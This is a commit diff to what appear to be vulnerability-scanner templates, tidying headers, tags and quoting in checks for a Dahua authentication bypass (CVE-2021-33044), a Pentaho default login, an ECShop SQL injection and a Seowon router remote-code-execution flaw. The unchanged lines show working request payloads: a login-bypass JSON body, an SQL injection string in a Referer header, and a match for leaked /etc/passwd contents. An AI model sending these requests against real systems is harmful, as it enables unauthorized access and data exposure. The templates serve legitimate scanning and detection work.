misc updates

2021-11-08 15:45:54 +05:30 · 2021-11-08 15:45:54 +05:30 · cb74944f43
parent c51bbf8715
commit cb74944f43
4 changed files with 9 additions and 15 deletions
--- a/cves/2021/CVE-2021-33044.yaml
+++ b/cves/2021/CVE-2021-33044.yaml
@ -25,8 +25,8 @@ requests:
        Connection: close
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-        Origin: http://{{Hostname}}/
-        Referer: http://{{Hostname}}/
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}

        {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}

@ -40,10 +40,10 @@ requests:
      - type: word
        part: body
        words:
-          - "\"result\":true"
-          - "id"
-          - "params"
-          - "session"
+          - '"result":true'
+          - 'id'
+          - 'params'
+          - 'session'
        condition: and

    extractors:
--- a/default-logins/pentaho/pentaho-default-login.yaml
+++ b/default-logins/pentaho/pentaho-default-login.yaml
@ -6,7 +6,7 @@ info:
  severity: high
  metadata:
    shodan-query: 'pentaho'
-  tags: pentaho,default-login,panel
+  tags: pentaho,default-login

 requests:
  - raw:
--- a/vulnerabilities/other/ecshop-sqli.yaml
+++ b/vulnerabilities/other/ecshop-sqli.yaml
@ -7,7 +7,7 @@ info:
  reference:
    - https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
    - https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
-  tags: sqli,php,cms,ecshop
+  tags: sqli,php,ecshop

 requests:
  - raw:
@ -15,10 +15,7 @@ requests:
        GET /user.php?act=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en,zh-CN;q=0.9,zh;q=0.8

    matchers:
      - type: word
--- a/vulnerabilities/other/seowon-router-rce.yaml
+++ b/vulnerabilities/other/seowon-router-rce.yaml
@ -13,9 +13,6 @@ requests:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
-        Accept: */*
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/diagnostic.html?t=201701020919
        Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin
@ -26,9 +23,9 @@ requests:
    matchers-condition: and
    matchers:
      - type: regex
+        part: body
        regex:
          - "root:.*:0:0"
-        part: body

      - type: status
        status: